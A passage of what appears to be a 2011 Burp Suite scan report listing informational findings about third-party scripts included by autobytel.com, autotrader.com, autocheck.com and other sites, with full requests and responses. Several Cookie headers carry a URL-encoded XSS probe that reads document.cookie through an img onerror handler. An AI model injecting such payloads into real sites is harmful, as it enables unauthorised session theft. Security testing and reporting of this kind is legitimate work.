       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.548. http://www.autobytel.com/repair-cost-calculator/my-garage.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /repair-cost-calculator/my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /repair-cost-calculator/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:49 GMT
Content-Length: 22180
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:48 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.549. http://www.autobytel.com/sitemap/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /sitemap/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:56 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51371


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.550. http://www.autobytel.com/used-cars.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /used-cars.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;info=13148;dcopt=ist;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=728x90;ptile=1;!cat=;ord=95298533?
  • http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;info=13148;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=160x600;ptile=3;!cat=;ord=95298533?
  • http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=300x250;ptile=2;!cat=;ord=95298533?
  • http://ad.doubleclick.net/adj/abtl.used/uhp;kw=uhp;info=13148;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=1x3;!cat=;ord=95298533?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=no&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /used-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:33 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 79078


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=728x90;ptile=1;!cat=;ord=95298533?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;info=13148;dcopt=ist;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=728x90;ptile=1;!cat=;ord=95298533?"></SCRIPT>
...[SNIP]...
B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=300x250;ptile=2;!cat=;ord=95298533?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=300x250;ptile=2;!cat=;ord=95298533?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.used/uhp;kw=uhp;info=13148;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=1x3;!cat=;ord=95298533?"></script>
...[SNIP]...
65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=160x600;ptile=3;!cat=;ord=95298533?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;info=13148;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=160x600;ptile=3;!cat=;ord=95298533?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=no&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.551. http://www.autobytel.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23119
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 16:04:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 16:04:10 GMT
Connection: close
Set-Cookie: cweb=JONQJVS10.4.128.184CKMMK; path=/
Set-Cookie: USER_UUID_VCH=37AC631C%2DE9D5%2DFD37%2DEDAF61EB5BA1725D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A09%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A09%27%7D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=1;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: --> <!-- Referer: None --> <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.552. http://www.autocheck.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autocheck.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.googleadservices.com/pagead/conversion.js
  • https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js
  • https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js
  • https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js
  • https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
  • https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /?WT.mc_id=1824&siteID=1824 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:12 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.19751295913252218; path=/; expires=Wed, 23-Feb-11 23:54:12 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=dmCvyWYCQne4gqVC62; path=/; expires=Wed, 23-Feb-2011 23:54:11 GMT
Set-Cookie: JSESSIONID=dmCvyWYCQne4gqVC62; path=/
Connection: close
Content-Type: text/html
Content-Length: 29237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js" ></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js" ></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js"></script>
...[SNIP]...

21.553. http://www.autotrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500
  • http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500
  • http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500
  • http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500
  • http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500
  • http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/global.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500
  • http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500
  • http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500
  • http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500
  • http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500

Request

GET / HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=4C16AC510625457D15A58A2D4558BCD7; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:28 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3526518282.61475.0000; path=/
Content-Length: 59997


<!DOCTYPE html P
...[SNIP]...
</style>


<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</a>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
</ul>

<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...

21.554. http://www.autotrader.com/hornav/trader/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /hornav/trader/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cetrk.com/pages/scripts/0006/4068.js
  • http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500
  • http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500
  • http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500
  • http://www.autotraderstatic.com/hornav/js/fsbo-survey.js?v=3.17.167500
  • http://www.autotraderstatic.com/hornav/js/fsbo_landing_page.js?v=3.17.167500
  • http://www.autotraderstatic.com/hornav/js/sellyourcar-english_mtagconfig.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/global.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500
  • http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500
  • http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500
  • http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500
  • http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500

Request

GET /hornav/trader/index.jsp HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:10 GMT
Server: Apache
Set-Cookie: JSESSIONID=D94B6DD5A6F34AF02DDCF09FF98C7E8B; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:10 GMT; Path=/
Set-Cookie: ac_afflt=; Path=/
Content-Language: en
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=2167563786.61475.0000; path=/
Content-Length: 43738


<birf:pageLoad pg="syc_lp"></birf:pageLoad>
<script type="text/javascript">
BIRFPageData = {
pg_inst:
...[SNIP]...
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/fsbo/new-gen-syc.css?v=3.17.167500" type="text/css" />


<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/hornav/js/fsbo_landing_page.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/hornav/js/fsbo-survey.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/hornav/js/sellyourcar-english_mtagconfig.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</iframe>


<script type="text/javascript" src="http://cetrk.com/pages/scripts/0006/4068.js"> </script>
...[SNIP]...

21.555. http://www.backtype.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backtype.com
Path:   /search

Issue detail

The response dynamically includes the following script from another domain:
  • http://api.mixpanel.com/site_media/js/api/mixpanel.js

Request

GET /search HTTP/1.1
Host: www.backtype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 23:56:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: BT=bb2426ba4c18241d1545e90dfa404f4a; expires=Wed, 23-Feb-2011 23:56:54 GMT; path=/; domain=.backtype.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <title>Sorry &mdash;
...[SNIP]...
<![endif]-->
   <script src="http://api.mixpanel.com/site_media/js/api/mixpanel.js" type="text/javascript"></script>
...[SNIP]...

21.556. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The response dynamically includes the following scripts from other domains:
